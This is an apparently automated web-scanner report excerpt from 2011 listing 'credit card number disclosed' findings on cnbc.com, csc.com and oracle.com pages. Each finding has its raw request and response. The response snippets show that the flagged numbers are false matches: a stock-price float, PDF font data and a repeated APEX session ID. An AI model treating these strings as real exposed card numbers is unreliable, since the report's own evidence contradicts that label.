http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html
http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html
http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html
http://www.oracle.com/index.html
http://www.oracle.com/technetwork/apps-tech/index-095827.html
http://www.oracle.com/technetwork/apps-tech/index-097651.html
http://www.oracle.com/technetwork/apps-tech/index.html
http://www.oracle.com/technetwork/architect/index.html
http://www.oracle.com/technetwork/articles/index.html
http://www.oracle.com/technetwork/community/developer-vm/index.html
http://www.oracle.com/technetwork/community/join/overview/index.html
http://www.oracle.com/technetwork/community/oracle-ace/index.html
http://www.oracle.com/technetwork/database/berkeleydb/downloads/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/documentation/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/overview/index.html
http://www.oracle.com/technetwork/database/express-edition/downloads/index.html
http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html
http://www.oracle.com/technetwork/dbadev/index.html
http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/eclipse/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/index.html
http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/sql-developer/downloads/index.html
http://www.oracle.com/technetwork/index.html
http://www.oracle.com/technetwork/indexes/documentation/index.html
http://www.oracle.com/technetwork/indexes/downloads/index.html
http://www.oracle.com/technetwork/indexes/products/index.html
http://www.oracle.com/technetwork/java/index.html
http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html
http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html
http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html
http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html
http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html
http://www.oracle.com/technetwork/oem/downloads/index-084446.html
http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html
http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html
http://www.oracle.com/technetwork/oem/grid-control/overview/index.html
http://www.oracle.com/technetwork/oramag/magazine/home/index.html
http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html
http://www.oracle.com/technetwork/systems/index.html
http://www.oracle.com/technetwork/topics/cloud/index.html
http://www.oracle.com/technetwork/topics/index.html
http://www.oracle.com/technetwork/topics/newtojava/index.html
http://www.oracle.com/technetwork/topics/newtojava/overview/index.html
http://www.oracle.com/technetwork/topics/security/index.html
http://www.oracle.com/technetwork/topics/soa/index.html
http://www.oracle.com/technetwork/topics/virtualization/index.html
http://www.oracle.com/us/community/index.html
http://www.oracle.com/us/corporate/Acquisitions/index.html
http://www.oracle.com/us/corporate/analystrelations/index.html
http://www.oracle.com/us/corporate/blogs/index.html
http://www.oracle.com/us/corporate/careers/index.html
http://www.oracle.com/us/corporate/citizenship/community/038108.htm
http://www.oracle.com/us/corporate/citizenship/index.html
http://www.oracle.com/us/corporate/customers/index.html
http://www.oracle.com/us/corporate/customers/oracle-users-groups-192206.html
http://www.oracle.com/us/corporate/features/engineered-173370.html
http://www.oracle.com/us/corporate/history/index.html
http://www.oracle.com/us/corporate/index.html
http://www.oracle.com/us/corporate/innovation/index.html
http://www.oracle.com/us/corporate/insight/index.html
http://www.oracle.com/us/corporate/investor-relations/corporate-governance-176724.html
http://www.oracle.com/us/corporate/investor-relations/index.html
http://www.oracle.com/us/corporate/oracle-racing-070515.html
http://www.oracle.com/us/corporate/press/BoardofDirectors/index.html
http://www.oracle.com/us/corporate/press/Executives/index.html
http://www.oracle.com/us/corporate/press/index.html
http://www.oracle.com/us/corporate/pricing/index.html
http://www.oracle.com/us/corporate/pricing/price-lists/index.html
http://www.oracle.com/us/corporate/profit/index.html
http://www.oracle.com/us/corporate/publishing/index.html
http://www.oracle.com/us/index.html
http://www.oracle.com/us/industries/communications/index.html
http://www.oracle.com/us/industries/education-and-research/018753.htm
http://www.oracle.com/us/industries/engineering-and-construction/index.html
http://www.oracle.com/us/industries/financial-services/index.html
http://www.oracle.com/us/industries/index.html
http://www.oracle.com/us/industries/retail/index.html
http://www.oracle.com/us/partnerships/solutions/index.html
http://www.oracle.com/us/partnerships/specialized-showcase-224514.html
http://www.oracle.com/us/products/applications/fusion/index.html
http://www.oracle.com/us/products/applications/index.html
http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html
http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html
http://www.oracle.com/us/products/applications/primavera/index.html
http://www.oracle.com/us/products/consulting/index.html
http://www.oracle.com/us/products/database/index.html
http://www.oracle.com/us/products/enterprise-manager/index.html
http://www.oracle.com/us/products/financing/index.html
http://www.oracle.com/us/products/index.html
http://www.oracle.com/us/products/middleware/exalogic/index.html
http://www.oracle.com/us/products/middleware/index.html
http://www.oracle.com/us/products/ondemand/index.html
http://www.oracle.com/us/products/productslist/index.html
http://www.oracle.com/us/products/servers-storage/index.html
http://www.oracle.com/us/products/servers-storage/solaris/index.html
http://www.oracle.com/us/products/tools/index.html
http://www.oracle.com/us/social-media/facebook/index.html
http://www.oracle.com/us/social-media/linkedin/index.html
http://www.oracle.com/us/social-media/twitter/index.html
http://www.oracle.com/us/solutions/corporate-governance/index.html
http://www.oracle.com/us/solutions/datawarehousing/index.html
http://www.oracle.com/us/solutions/ent-performance-bi/index.html
http://www.oracle.com/us/solutions/midsize/index.html
http://www.oracle.com/us/solutions/performance-scalability/index.html
http://www.oracle.com/us/solutions/solutions-165852.html
http://www.oracle.com/us/sun/index.html
http://www.oracle.com/us/support/advanced-customer-services/index.html
http://www.oracle.com/us/support/contact-068555.html
http://www.oracle.com/us/support/development-tools-080025.html
http://www.oracle.com/us/support/index.html
http://www.oracle.com/us/support/lifetime-support/index.html
http://www.oracle.com/us/support/oracle-support-services-359636.html
http://www.oracle.com/us/support/policies/index.html
http://www.oracle.com/us/support/premier/index.html
http://www.oracle.com/us/support/support-integration/index.html
http://www.oracle.com/us/syndication/subscribe/index.html
http://www.oracle.com/us/technologies/cloud/index.html
http://www.oracle.com/us/technologies/java/index.html
http://www.oracle.com/us/technologies/virtualization/index.html
http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

25.1. http://api.cnbc.com/api/movers/movers.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Issue detail

The following credit card number was disclosed in the response:

5500196155355126

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=3&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_most_recent_quotes=.DJIA; cnbc_regional_cookie=US; cnbcStreamQuoteMasterToggleRememberSwitch=on; s_cc=true; s_nr=1315341081909; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 15:34:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Tue, 06 Sep 2011 14:54:02 GMT
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Content-Length: 1910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel='stylesheet' ty
...[SNIP]...
mbol":"US;SPX","gainers":[{"ticker":"SUN","company":"Sunoco Inc","change":"3.3","raw":3.2677956244807453,"direction":"gainers"},{"ticker":"IP","company":"International Paper Co","change":"2.6","raw":2.5500196155355126,"direction":"gainers"},{"ticker":"DV","company":"DeVry Inc","change":"1.4","raw":1.448208149239068,"direction":"gainers"}],"losers":[{"ticker":"ATI","company":"Allegheny Technologies Inc","change":"6.
...[SNIP]...

25.2. http://assets1.csc.com/es/downloads/7380_2.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/es/downloads/7380_2.pdf

Issue detail

The following credit card number was disclosed in the response:

4804802402400617

Request

GET /es/downloads/7380_2.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: 1vptvkdbk27rpKm8gktp99PjKr2H3nFbiLFY+PGrKUxDkGYoKaaXHRZvwxnB+eu+
x-amz-request-id: 5E4300587F716F53
Date: Tue, 06 Sep 2011 17:06:02 GMT
Last-Modified: Thu, 13 Nov 2008 12:16:15 GMT
ETag: "f216d5d5987acb4495ffec28a81cfbf6"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 3210194
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: b910ab2588d6c1aa584cbfe23779883d9f19ff58eb141762f7f07a92f22f036c35a02ee70c0c43b4
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.6%....
645 0 obj<</PageMode/UseOutlines/ViewerPreferences<</Direction/L2R>>/Outlines 696 0 R/Metadata 642 0 R/AcroForm 646 0 R/Pages 632 0 R/PageLayout/SinglePage/OpenAction 1243 0 R/Type/Ca
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...
</Subtype/Type1/FontDescriptor 522 0 R/LastChar 224/Widths[547 547 230 269 0 480 480 0 702 0 370 370 0 617 240 365 240 320 480 480 480 480 480 480 480 480 480 480 240 240 0 617 0 342 0 645 586 659 729 554 515 702 767 336 330 657 531 893 741 745 558 745 622 476 606 729 668 944 0 595 599 370 0 370 0 0 0 436 515 417 528 420 295 456 533 266 255 490 252 824 546 517 528 512 367 35
...[SNIP]...

25.3. http://assets1.csc.com/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf

Issue detail

The following credit card numbers were disclosed in the response:

4932501239750
5326865634734950
5565565560333500

Request

GET /lef/downloads/LEFBriefing_TestingApplicationsCloud_021011.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: J17Unk9b4idn9zwu1HmUcQ2AY+eVLRBTH3oMcV9+J6TxzyMIDeojEOJQU+vrrj86
x-amz-request-id: CD4228B00893E8EB
Date: Tue, 06 Sep 2011 17:06:06 GMT
Last-Modified: Thu, 17 Feb 2011 18:48:05 GMT
ETag: "f6b07e2e2f31147f835cf2cf7da8e009"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 3339531
Server: AmazonS3
Age: 2
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: c14f5715e79dc56c358938c6754402fb768e7a7596d0092d89f5251b2db16783d2b305ee24544ef2
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 1172 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 45/Kids[ 3 0 R 16 0 R 22 0 R 31 0 R 51 0 R 8
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 4073 0 R>
...[SNIP]...
bj
[ 4[ 1030] 57[ 786] 131[ 458] 190[ 794] ]
endobj
4072 0 obj
[ 226 0 0 0 0 0 705 0 0 0 0 0 0 0 0 430 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 606 561 529 630 488 459 637 0 267 0 547 423 874 659 676 532 686 563 473 495 0 591 0 551 520 0 0 0 0 0 0 0 494 0 418 537 503 316 474 537 246 0 480 246 813 537 538 537 537 355 399 347 537 473 745 459 474 397]
endobj
4073 0 obj
<</Filter/FlateDecode/Length 64003/Length1 120812
...[SNIP]...
0 0 0 0 0 0 0 0 0 278 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 667 722 0 0 0 0 722 278 0 667 0 833 0 778 667 0 722 667 611 0 667 944 0 0 0 0 0 0 0 0 0 556 0 500 556 556 278 556 0 222 0 500 222 833 556 556 556 0 333 500 278 556 0 722 500 500]
endobj
4077 0 obj
[ 228 0 0 0 0 0 547 0 0 0 0 0 0 273 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 547 0 592 592 547 0 0 0 228 0 0 0 0 0 638 547 638 592 547 501 592 547 774 0 0 0 0
...[SNIP]...

25.4. http://assets1.csc.com/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets1.csc.com
Path:	/lef/downloads/LEF_Briefing_TestingCoE_052809.pdf

Issue detail

The following credit card number was disclosed in the response:

4932501239750

Request

GET /lef/downloads/LEF_Briefing_TestingCoE_052809.pdf HTTP/1.1
Host: assets1.csc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
x-amz-id-2: zYYJljlF5SFE+GrD4CJRlBUcaGTK1OuLAnYS8gsTn5kHdogibKjGZ/Zkyh5XQiZb
x-amz-request-id: 7262CFD5F70F1995
Date: Tue, 06 Sep 2011 17:06:04 GMT
Last-Modified: Mon, 08 Jun 2009 18:04:03 GMT
ETag: "600baff3759b06e56fd71b9bed3cb369"
Accept-Ranges: bytes
Content-Type: application/pdf
Content-Length: 1587670
Server: AmazonS3
Age: 1
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: f6b26ddea16ad0da23493e32edb9bf8a272ca7921b731bc65066ee96909744e4136b8374a30ab146
Via: 1.0 c36847c5252e758d61b94a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

%PDF-1.5
%....
1 0 obj
<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 381 0 R/MarkInfo<</Marked true>>>>
endobj
2 0 obj
<</Type/Pages/Count 18/Kids[ 3 0 R 15 0 R 25 0 R 33 0 R 41 0 R 79
...[SNIP]...
</Type/FontDescriptor/FontName/ABCDEE+Calibri,Bold/Flags 32/ItalicAngle 0/Ascent 750/Descent -250/CapHeight 750/AvgWidth 518/MaxWidth 1732/FontWeight 700/XHeight 250/StemV 51/FontBBox[ -493 -250 1239 750] /FontFile2 2528 0 R>
...[SNIP]...

25.5. http://education.oracle.com/education/jscripts/otn_nav1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/education/jscripts/otn_nav1.js

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /education/jscripts/otn_nav1.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "1727b10-d341-4dda4475"
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 11:26:45 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=297;ecid=72057854303488537,0)
Content-Length: 54081
Date: Sat, 03 Sep 2011 05:18:14 GMT
Accept-Ranges: bytes

...function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
var d=document; if(d.imag
...[SNIP]...
ex.html";
var otn_level8_sccode ="otnarticles";
var otn_level8_items = [ ];

var otn_level9_label =rd_temp_config.mosaic_otn_5;
var otn_level9_link ="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468";
var otn_level9_sccode ="otntutorials";
var otn_level9_items = [ ];

var otn_level10_label =rd_temp_config.mosaic_otn_6;
var otn_level10_link ="http://www.oracle.com/newsletters/index.html#te
...[SNIP]...

25.6. https://education.oracle.com/education/jscripts/otn_nav1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/education/jscripts/otn_nav1.js

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /education/jscripts/otn_nav1.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "1727b10-d341-4dda4475"
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 11:26:45 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=298;ecid=144115392507189562,0)
Content-Length: 54081
Date: Sat, 27 Aug 2011 05:43:57 GMT
Accept-Ranges: bytes

...function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
var d=document; if(d.imag
...[SNIP]...
ex.html";
var otn_level8_sccode ="otnarticles";
var otn_level8_items = [ ];

var otn_level9_label =rd_temp_config.mosaic_otn_5;
var otn_level9_link ="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468";
var otn_level9_sccode ="otntutorials";
var otn_level9_items = [ ];

var otn_level10_label =rd_temp_config.mosaic_otn_6;
var otn_level10_link ="http://www.oracle.com/newsletters/index.html#te
...[SNIP]...

25.7. http://www.oracle.com/ao/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/ao/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /ao/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41185998748378867,0:1)
Date: Tue, 06 Sep 2011 16:16:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','ao','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.8. http://www.oracle.com/as/corporate/contact/bangladesh-316183-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/bangladesh-316183-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/bangladesh-316183-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.9. http://www.oracle.com/as/corporate/contact/bhutan-316187-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/bhutan-316187-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/bhutan-316187-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.10. http://www.oracle.com/as/corporate/contact/brunei-316198-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/brunei-316198-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/brunei-316198-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=36013329115639045,0:1)
Date: Tue, 06 Sep 2011 16:16:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.11. http://www.oracle.com/as/corporate/contact/cambodia-316193-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/cambodia-316193-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/cambodia-316193-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.12. http://www.oracle.com/as/corporate/contact/laos-316260-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/laos-316260-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/laos-316260-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.13. http://www.oracle.com/as/corporate/contact/maldives-316209-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/maldives-316209-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/maldives-316209-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.14. http://www.oracle.com/as/corporate/contact/nepal-316215-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/nepal-316215-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/nepal-316215-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.15. http://www.oracle.com/as/corporate/contact/pakistan-316185-en-as.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/as/corporate/contact/pakistan-316185-en-as.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /as/corporate/contact/pakistan-316185-en-as.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41104347125119295,0:1)
Date: Tue, 06 Sep 2011 16:17:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','as','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.16. http://www.oracle.com/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=35807978136234850,0:1)
Content-Length: 138644
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:53:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.17. http://www.oracle.com/technetwork/apps-tech/index-095827.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/apps-tech/index-095827.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /technetwork/apps-tech/index-095827.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.18. http://www.oracle.com/technetwork/apps-tech/index-097651.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/technetwork/apps-tech/index-097651.html

